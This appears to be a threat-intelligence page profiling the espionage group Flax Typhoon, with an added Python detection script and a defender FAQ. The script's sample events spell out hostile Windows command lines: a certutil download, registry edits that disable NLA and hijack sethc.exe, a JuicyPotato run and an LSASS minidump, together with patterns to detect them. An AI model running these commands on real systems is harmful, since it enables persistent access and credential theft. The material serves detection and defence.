Flax Typhoon
Flax Typhoon is a China-based cyber-espionage group that infiltrates organizations by exploiting public-facing services, then maintains stealthy, long-term access with legitimate software, built-in Windows utilities, and valid accounts rather than custom malware.

The Origin of Flax Typhoon
Flax Typhoon is a China-based nation-state activity group that Microsoft has tracked since mid-2021. The actor focuses on long-term access and espionage, operating with minimal bespoke malware. Instead the group relies heavily on living-off-the-land binaries, legitimate third-party software, web shells, and hands-on-keyboard activity to quietly maintain presence in target networks. Microsoft attributes a campaign primarily against organizations in Taiwan to this group, though activity has been observed elsewhere.
Countries targeted by Flax Typhoon
The activity is concentrated in Taiwan, with some victims in Southeast Asia, North America, and Africa. The tooling and techniques are reusable and could be applied outside the region.
Industries targeted by Flax Typhoon
Flax Typhoon has primarily targeted government agencies, education, critical manufacturing, and information technology organizations. The campaign appears collection-oriented rather than disruptive, consistent with espionage objectives.
Flax Typhoon's Victims
Microsoft reported dozens of affected organizations. Initial access typically comes through internet-facing systems such as VPN gateways and servers running web, Java, and SQL services: the actor exploits known vulnerabilities in those services and deploys web shells to gain a foothold.
Flax Typhoon's Attack Method

Exploits known vulnerabilities in public-facing applications and services to deploy web shells such as China Chopper.

Uses public open-source privilege-escalation tools (Juicy Potato, BadPotato and variants) and known vulnerability exploits to elevate privileges on compromised hosts.

Establishes long-term access by enabling Remote Desktop, disabling Network Level Authentication (NLA) in the registry, hijacking the Sticky Keys accessibility binary (sethc.exe), typically by registering a debugger for it under Image File Execution Options so a shell or Task Manager can be launched from the logon screen, and installing a legitimate VPN client (SoftEther) to tunnel RDP traffic to actor-controlled infrastructure. The VPN binary is fetched with signed system tools (certutil, bitsadmin, PowerShell Invoke-WebRequest) and, per Microsoft, renamed to look like a Windows component such as conhost.exe or dllhost.exe. Throughout, the actor operates with legitimate accounts and living-off-the-land binaries and avoids heavy malware to reduce detection.

Dumps credentials and memory from LSASS using tools like Mimikatz and other credential-dumping techniques.

Uses the established VPN tunnels, built-in utilities, and legitimate remote services (Remote Desktop among them) to scan the network, probe other systems, and move laterally.

Executes commands and lightweight tools interactively, collects credentials and configuration information, and stages data for exfiltration via established tunnels or proxying hosts.


Microsoft did not observe broad destructive actions in this campaign; the activity appears focused on stealthy access and collection rather than sabotage.
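The chain above, turned into detection logic over endpoint process-creation events, as an added example for this page (not Microsoft's or Vectra's code). It assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine), uses constructed sample events rather than real telemetry, matches the potato tools on file name only (a renamed copy needs EDR token-manipulation telemetry instead), and treats conhost.exe or dllhost.exe running outside System32/SysWOW64 as a renamed VPN binary on the strength of Microsoft's report that SoftEther was disguised under those names:

```python
"""Triage Windows process-creation events for the Flax Typhoon tradecraft above.

Added example, not code from Microsoft or Vectra. Field names follow Sysmon
Event ID 1 as an assumption; SAMPLE_EVENTS is constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Finding:
    rule: str
    record_id: int
    detail: str


WEB_WORKERS = {"w3wp.exe", "httpd.exe", "java.exe", "tomcat9.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
ACCESSIBILITY_BINS = ("sethc.exe", "utilman.exe")


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(ev: dict) -> list[Finding]:
    """Return every rule a single event trips (one event may trip several)."""
    image, parent = _base(ev["Image"]), _base(ev.get("ParentImage", ""))
    full_path, cmd = ev["Image"].lower(), ev.get("CommandLine", "").lower()
    hits: list[Finding] = []

    def hit(rule: str, detail: str) -> None:
        hits.append(Finding(rule, ev["RecordId"], detail))

    # Initial access: a web server worker spawning a shell is the classic
    # sign of a web shell (China Chopper or otherwise) running commands.
    if parent in WEB_WORKERS and image in SHELLS:
        hit("web_shell_child", f"{parent} -> {image}")
    # Tool download through signed system binaries (certutil, bitsadmin, PowerShell).
    if (image == "certutil.exe" and "-urlcache" in cmd and "http" in cmd) or \
       (image == "bitsadmin.exe" and "/transfer" in cmd) or \
       (image in SHELLS and ("invoke-webrequest" in cmd or "iwr " in cmd)):
        hit("lolbin_download", cmd)
    # RDP persistence: NLA off (UserAuthentication=0) or RDP on (fDenyTSConnections=0).
    if image == "reg.exe" and "terminal server" in cmd and \
       re.search(r"(userauthentication|fdenytsconnections)\b.*\b0\b", cmd):
        hit("rdp_weakened", cmd)
    # Sticky Keys hijack: an IFEO debugger on an accessibility binary yields a
    # pre-logon shell from the RDP login screen.
    if image == "reg.exe" and "image file execution options" in cmd and \
       "debugger" in cmd and any(b in cmd for b in ACCESSIBILITY_BINS):
        hit("accessibility_ifeo", cmd)
    # Public potato-family privilege-escalation tools, matched on file name only.
    if re.search(r"(juicy|bad|sweet|rogue|god)potato", image):
        hit("potato_privesc", image)
    # Credential dumping: Mimikatz or an LSASS minidump via procdump/comsvcs.
    if "mimikatz" in image or "sekurlsa::" in cmd or \
       (image.startswith("procdump") and "lsass" in cmd) or \
       (image == "rundll32.exe" and "comsvcs.dll" in cmd and "minidump" in cmd):
        hit("lsass_dump", cmd)
    # Renamed VPN binary: genuine conhost.exe/dllhost.exe only run from
    # System32/SysWOW64 (assumption: nothing else in the estate ships them).
    if image in {"conhost.exe", "dllhost.exe"} and not full_path.startswith(SYSTEM_DIRS):
        hit("renamed_system_binary", full_path)
    return hits


def triage(events: list[dict]) -> dict[str, list[int]]:
    """Map each tripped rule to the sorted record ids that tripped it."""
    by_rule: dict[str, list[int]] = {}
    for ev in events:
        for f in classify(ev):
            by_rule.setdefault(f.rule, []).append(f.record_id)
    return {rule: sorted(ids) for rule, ids in by_rule.items()}


# Constructed sample events (not real telemetry); records 8 and 9 are benign controls.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": "cmd.exe /c whoami"},
    {"RecordId": 2, "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/v.zip C:\ProgramData\v.zip"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\reg.exe", "CommandLine":
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'},
    {"RecordId": 4, "Image": r"C:\Windows\System32\reg.exe", "CommandLine":
     r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f'},
    {"RecordId": 5, "Image": r"C:\ProgramData\Microsoft\conhost.exe", "CommandLine": "conhost.exe /start"},
    {"RecordId": 6, "Image": r"C:\ProgramData\JuicyPotato.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "JuicyPotato.exe -l 1337 -p cmd.exe -t *"},
    {"RecordId": 7, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\ProgramData\l.dmp full"},
    {"RecordId": 8, "Image": r"C:\Windows\System32\conhost.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"RecordId": 9, "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": "certutil.exe -verify cert.cer"},
]

if __name__ == "__main__":
    for rule, ids in triage(SAMPLE_EVENTS).items():
        print(f"{rule:24} records {ids}")
```

Each rule corresponds to one step of the chain, so a host that trips several of them in sequence (web shell child, then download, then RDP weakening, then a non-System32 conhost.exe) is a far stronger signal than any single hit; the two benign controls show why the path check matters for the renamed-binary rule.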

TTPs Used by Flax Typhoon
How to Detect Flax Typhoon with Vectra AI
FAQs
Is Flax Typhoon destructive ransomware or espionage-focused?
Microsoft observed espionage-style activity focused on long-term access and credential collection, not destructive ransomware.
What makes detection difficult for this actor?
Heavy use of legitimate tools, system binaries, and valid accounts reduces signature detections and increases false negatives; behavioral detection and correlation are required.
Which artifacts should be high priority when triaging a suspected compromise?
Web shell files on internet-facing servers, registry changes that disable NLA or enable RDP, Image File Execution Options debugger entries for accessibility binaries (sethc.exe), SoftEther VPN processes running under atypical accounts or disguised as conhost.exe/dllhost.exe outside System32, and LSASS memory dumps.
Are there published hunting queries or detection rules to use?
Yes, Microsoft published Microsoft 365 Defender and Sentinel hunting queries and example detections, including KQL examples and TI mapping. Use them as a baseline and adapt to your telemetry.
Should we block the IPs Microsoft listed?
Block or sinkhole known malicious infrastructure where operationally feasible, but treat IPs as ephemeral. Combine IP blocks with behavioral detections for lasting coverage.
How to prioritize remediation after detection?
Immediately isolate and investigate compromised hosts, reset impacted accounts, rebuild internet-facing servers where web shells are found, and perform credential rotations.
What telemetry is most valuable for detecting this group?
Process creation and command line telemetry on endpoints, network connections to unusual external endpoints, web server file modifications and HTTP logs, and EDR traces of LSASS access.
Do standard AV products detect their tooling?
Some tooling (Mimikatz, known backdoors) is detected by AV, but much of Flax Typhoon’s activity uses LOLBins and legitimate tools; rely on EDR behavioral detections and correlation for coverage.
Any quick hardening checklist?
Patch public-facing services, enforce MFA, re-enable NLA and audit the Terminal Server and Image File Execution Options registry keys, restrict RDP and VPN access via conditional access or jump hosts, run LSASS as a protected process (RunAsPPL) or enable Credential Guard, and alert on certutil/bitsadmin downloads.
Where can I get the official details, hunting queries, and IOCs?
Microsoft's August 2023 blog post, "Flax Typhoon using legitimate software to quietly access Taiwanese organizations", contains the full analysis, hunting queries (KQL), and indicators of compromise.